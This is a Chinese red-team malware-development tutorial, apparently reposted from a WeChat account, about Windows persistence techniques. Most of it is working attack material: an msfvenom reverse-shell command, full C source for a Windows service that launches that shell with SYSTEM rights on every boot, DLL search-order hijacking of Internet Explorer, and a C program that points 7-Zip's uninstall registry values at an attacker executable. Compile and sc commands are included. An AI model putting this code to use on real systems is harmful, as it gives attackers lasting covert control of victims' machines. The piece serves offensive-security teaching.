03-DLL搜索顺序劫持
发现 C:\Program Files\internet explorer\suspend.dll
需要管理员权限把恶意dll文件复制到 C:\Program Files\internet explorer\suspend.dll,打开IE的时候dll会被加载运行,在Windows 11上仍可以成功
04-利用服务持久化
注册成服务,需要管理员权限
先生成反弹shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4445 -f exe > meow.exe
再编写创建服务代码
#include <windows.h>
#include <stdio.h>
// Poll interval (ms) for the idle loop in ServiceMain.
#define SLEEP_TIME 5000
// Status reported to the SCM; written by ServiceMain and ControlHandler,
// read by ServiceMain's polling loop.
SERVICE_STATUS serviceStatus;
// Handle returned by RegisterServiceCtrlHandler; every SetServiceStatus call goes through it.
SERVICE_STATUS_HANDLE hStatus;
// NOTE(review): the SCM expects LPSERVICE_MAIN_FUNCTION / LPHANDLER_FUNCTION
// (WINAPI calling convention, DWORD argc); these prototypes only work because
// main() and ServiceMain() cast the function pointers when registering them.
void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);
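// run process meow.exe - reverse shell
//
// Spawns the payload at a hard-coded path and blocks until it exits.
// Returns 0 when the child was started and ran to completion, 1 when
// CreateProcess failed (missing file, access denied, ...).
//
// Detection note: a service binary that immediately spawns a child is visible
// in process-creation telemetry (parent = this service, itself started by
// services.exe) and in the service-install event (System log 7045) written
// when the service is registered.
int RunMeow(void) {
    // for example: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4445 -f exe > meow.exe
    // Backslashes are escaped: an unescaped "\04" is an octal escape and
    // truncates the path. CreateProcess may write to lpCommandLine, so this
    // has to be a writable array rather than a string literal.
    char cmd[] = "Z:\\packtpub\\chapter03\\04-exploring-windows-services-for-persistence\\meow.exe";
    STARTUPINFO si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.cb = sizeof si;

    if (!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        // Nothing was started; pi holds no valid handles to wait on or close.
        return 1;
    }
    WaitForSingleObject(pi.hProcess, INFINITE);
    // CreateProcess returns two handles; the original code closed only the
    // process handle and leaked the thread handle on every spawn.
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}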
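// Process entry point: hands control to the Service Control Manager, which
// calls ServiceMain on its own thread. Returns 0 once all services in the
// table have stopped, 1 when the dispatcher could not connect (for example
// when the binary is run from a console instead of being started by the SCM).
int main(void) {
    SERVICE_TABLE_ENTRY ServiceTable[] = {
        {"MeowService", (LPSERVICE_MAIN_FUNCTION) ServiceMain},
        {NULL, NULL}
    };
    // Blocks until every listed service has stopped; FALSE means no service
    // ran at all, which the original code silently ignored.
    if (!StartServiceCtrlDispatcher(ServiceTable)) {
        return 1;
    }
    return 0;
}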
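// SCM entry for MeowService: publishes the initial status, registers the
// control handler, runs the payload, then idles until ControlHandler marks
// the service stopped. argc/argv are the service start arguments (unused).
//
// NOTE(review): RunMeow() blocks until the child exits and is called before
// the state is reported as SERVICE_RUNNING, so the service stays in
// START_PENDING (observable with `sc query MeowService`) for as long as the
// child lives; with dwWaitHint == 0 the SCM may treat that as a failed start.
void ServiceMain(int argc, char** argv) {
    (void)argc;
    (void)argv;
    serviceStatus.dwServiceType = SERVICE_WIN32;
    serviceStatus.dwCurrentState = SERVICE_START_PENDING;
    serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    serviceStatus.dwWin32ExitCode = 0;
    serviceStatus.dwServiceSpecificExitCode = 0;
    serviceStatus.dwCheckPoint = 0;
    serviceStatus.dwWaitHint = 0;
    hStatus = RegisterServiceCtrlHandler("MeowService", (LPHANDLER_FUNCTION)ControlHandler);
    if (hStatus == NULL) {
        // No status handle means nothing can be reported to the SCM; the
        // original code went on to call SetServiceStatus with a null handle.
        return;
    }
    RunMeow();
    serviceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &serviceStatus);
    // serviceStatus is modified by ControlHandler on the SCM's thread; this
    // plain (non-atomic) poll is the original design and is kept as is.
    while (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
        Sleep(SLEEP_TIME);
    }
}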
// Control callback registered by ServiceMain. STOP and SHUTDOWN are handled
// identically: mark the service stopped (which also ends ServiceMain's
// polling loop) and report it. Any other control just re-reports the
// current status unchanged.
void ControlHandler(DWORD request) {
    if (request == SERVICE_CONTROL_STOP || request == SERVICE_CONTROL_SHUTDOWN) {
        serviceStatus.dwWin32ExitCode = 0;
        serviceStatus.dwCurrentState = SERVICE_STOPPED;
    }
    SetServiceStatus(hStatus, &serviceStatus);
}
编译
x86_64-w64-mingw32-g++ -O2 meowsrv.c -o meowsrv.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
管理员权限添加服务
sc create MeowService binpath= "C:\Users\admin\Downloads\meowsrv.exe" start= auto
添加成功后重启,服务会运行,且权限是系统权限
查看服务
sc query MeowService
启动服务
sc start MeowService
系统权限
停止删除服务
sc stop MeowService
sc delete MeowService
注意meow.exe不是服务类型程序,作为服务需要使用meowsrv.exe,实战中更多的是更改现有服务而不是新建服务
05-其他持久化
卸载程序注册表项,关注下面注册表位置
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<application name>
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<application name>\QuietUninstallString
以7z为例,卸载的时候会运行Uninstall.exe
查询注册表
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /s
写一个helloword程序和一个修改注册表程序
#include <windows.h>
#pragma comment (lib, "user32.lib")
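// Minimal GUI program used as the stand-in "payload" for the uninstall-key
// demo: it only shows a message box so that its execution is easy to observe.
// The four parameters are part of the WinMain contract and are not used.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    (void)hInstance;
    (void)hPrevInstance;
    (void)lpCmdLine;
    (void)nCmdShow;
    // MessageBoxA is named explicitly: the MessageBox macro resolves to the
    // wide-character variant when UNICODE is defined, and these literals are narrow.
    MessageBoxA(NULL, "Hello, Packt!", "=^..^=", MB_OK);
    return 0;
}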
编译
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
代码
#include <windows.h>
#include <string.h>
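// Rewrites 7-Zip's UninstallString / QuietUninstallString values to point at
// hack.exe. Writing under HKLM needs administrative rights. Returns 0 when
// both values were written, 1 when the key could not be opened for writing
// or either write failed (the original code ignored every return value).
//
// Detection note: this is two ordinary value-set operations on
// HKLM\...\CurrentVersion\Uninstall\<app>, so registry-modification telemetry
// on that key path (e.g. Sysmon Event ID 13) observes the technique directly.
int main(int argc, char* argv[]) {
    (void)argc;
    (void)argv;
    HKEY hkey = NULL;
    // target app (backslashes must be escaped inside a C string literal;
    // an unescaped "\U" does not even compile)
    const char* app = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\7-zip";
    // evil app
    const char* exe = "C:\\Users\\user\\Desktop\\packtpub\\hack.exe";
    // app
    LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)app, 0, KEY_WRITE, &hkey);
    if (res != ERROR_SUCCESS) {
        // Typically ERROR_ACCESS_DENIED when not elevated, or
        // ERROR_FILE_NOT_FOUND when 7-Zip is not installed.
        return 1;
    }
    // For REG_SZ the documented cbData must include the terminating NUL;
    // passing strlen(exe) alone stores the string without its terminator.
    DWORD cb = (DWORD)strlen(exe) + 1;
    // update registry key value
    // reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "...\hack.exe" /f
    LONG r1 = RegSetValueEx(hkey, (LPCSTR)"UninstallString", 0, REG_SZ, (const BYTE*)exe, cb);
    LONG r2 = RegSetValueEx(hkey, (LPCSTR)"QuietUninstallString", 0, REG_SZ, (const BYTE*)exe, cb);
    RegCloseKey(hkey);
    return (r1 == ERROR_SUCCESS && r2 == ERROR_SUCCESS) ? 0 : 1;
}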
编译
x86_64-w64-mingw32-g++ -O2 pers.c -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
管理员运行后,查看注册表
卸载7z的时候hack.exe会运行
父进程是SystemSettings.exe
还原注册表
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "C:\Program Files\7-zip\Uninstall.exe" /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "QuietUninstallString" /t REG_SZ /d "C:\Program Files\7-zip\Uninstall.exe" /f
原文始发于微信公众号(高级红队专家):【MalDev-05】持久化基础与实战-2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。